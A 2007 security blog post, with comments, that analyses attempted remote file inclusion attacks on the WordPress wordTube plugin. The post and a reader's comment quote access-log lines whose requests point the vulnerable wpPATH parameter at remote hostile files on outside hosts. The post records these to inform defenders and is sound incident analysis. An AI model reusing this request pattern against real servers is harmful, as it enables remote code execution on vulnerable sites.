Blog Under Siege

Posted by DK
July 3, 2007

WordPress wordTube <= 1.43 is listed on BlogSecurity’s dangerous WordPress software list "BlogWatch". This wp-plugin is vulnerable to a File Include Vulnerability, this means an attacker can execute commands on a vulnerable WordPress server by appending the URL to a malicious file on a remote server under the attacker’s control.

An attacker attempted to exploit this vulnerability on BlogSecurity today, and I thought it would be educational to show what the attacker tried.

The attack looks as follows:

  1. 212.227.90.165 – - [03/Jul/2007:08:34:37 -0600] “GET /category/wordpress//wp-content/plugins/wordtube/wordtube-button.php?
    wpPATH=http://www.pc-users.de/images/avatar/up.txt? HTTP/1.1″ 404 6099 “-” “libwww-perl/5.803″
  2. 212.227.90.165 – - [03/Jul/2007:08:34:38 -0600] “GET /category/wordpress//wp-content/plugins/wordtube/wordtube-button.php?
    wpPATH=http://www.pc-users.de/images/avatar/up.txt? HTTP/1.1″ 404 6099 “-” “libwww-perl/5.803″
  3. 74.200.206.130 – - [03/Jul/2007:10:14:54 -0600] “GET //wp-content/plugins/wordtube/wordtube-button.php?
    wpPATH=http://www.ws-usa.com/uni/error.txt? HTTP/1.1″ 404 6093 “-” “libwww-perl/5.805″
  4. 74.200.206.130 – - [03/Jul/2007:10:55:16 -0600] “GET /wp-content/plugins/wordtube/wordtube-button.php?
    wpPATH=http://www.ws-usa.com/uni/error.txt? HTTP/1.1″ 404 6099 “-” “libwww-perl/5.805″

We see the attacker is making requests from, ‘212.227.90.165′ (Schlund + Partner AG) and ‘74.200.206.130′ (FastServers, Inc.), and that they either own or have more likely compromised ‘www.pc-users.de’ and ‘www.ws-usa.com’.

As you can see above, the attacker is trying to "include" a malicious text file full of bad requests via wordtube/wordtube-button.php. You will see the web server is responding with a 404 error message as these files don’t exist. What’s interesting is that that the BlogWatch feed ‘/category/wordpress/blogwatch/feed’, included the vulnerable version tag wordTube <= 1.43. This may have been enough to trigger an automated attack program that has made the mistake of thinking that BlogSecurity is actually running a vulnerable version of WordTube like a bloodhound.

Making an assumption then, I would assume that the attacker(s) here have two programs. The first locates and detects our vulnerable WordPress plugin and the second launches the attack. At some point the attacker will login to these servers to see what fruit they have plucked from the vine.

I have heard users many times tell me that they don’t care if their blog gets hacked! To these individuals may I leave you a thought: The servers listed above that are attacking me today may be yours! By remaining idle, you may be inadvertently supporting them.

I have contacted the providers regarding these attacks.

Articles, WordPress

Random Posts

If you enjoyed this post, please leave a comment or subscribe to the feed and get future articles delivered to your feed reader.

Comments
Comment by Nick on July 3, 2007 @ 1:39 pm

It must be hack wordtube day.. look what I found :(


75.126.70.242 - - [02/Jul/2007:18:53:54 +0100] "GET /wp-content/wp-content/plugins/wordtube/wordtube-button.php?
wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.805"
75.126.70.242 - - [02/Jul/2007:18:53:54 +0100] "GET /wp-content/plugins/wordtube/wordtube-button.php?
wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.805"
66.230.197.155 - - [03/Jul/2007:04:05:13 +0100] "GET /wp-content/wp-content/plugins/wordtube/wordtube-button.php?
wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4586 "-" "libwww-perl/5.805"
66.230.197.155 - - [03/Jul/2007:04:05:14 +0100] "GET /wp-content/plugins/wordtube/wordtube-button.php?
wpPATH=http://securityjobs.us/xpl/tembak.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.805"
204.15.10.144 - - [03/Jul/2007:04:07:18 +0100] "GET /wp-content/plugins/wordtube/wordtube-button.php?
wpPATH=http://www.securityjobs.us/xpl/meks.txt? HTTP/1.1" 404 4585 "-" "libwww-perl/5.79"

luckily I don’t have wordtube installed :)

Comment by Nick on July 3, 2007 @ 1:41 pm

oops sorrry, looks like the [code] tag doesn't wrap properly.

Comment by David Kierznowski on July 3, 2007 @ 2:25 pm

Nick, fixed :)

To be honest, I think this is one of the more popular WordPress exploits, I have seen it in my logs before.

Comment by Daniel on July 4, 2007 @ 12:30 am

Another reason why mod_security is so sexy running alongside code which has been developed with security last in the process. When will these people learn about SDLC?

Comment by David Kierznowski on July 4, 2007 @ 1:08 am

Daniel, mod_security can be really useful if the user knows how to set it up and assuming their blog is not hosted.

Comment by Stefan Esser on July 4, 2007 @ 1:51 am

Daniel,

I hope you do not believe that mod_security protects you against attacks. It just protects you against the dumb worms…

Leave a comment

(required)

(required)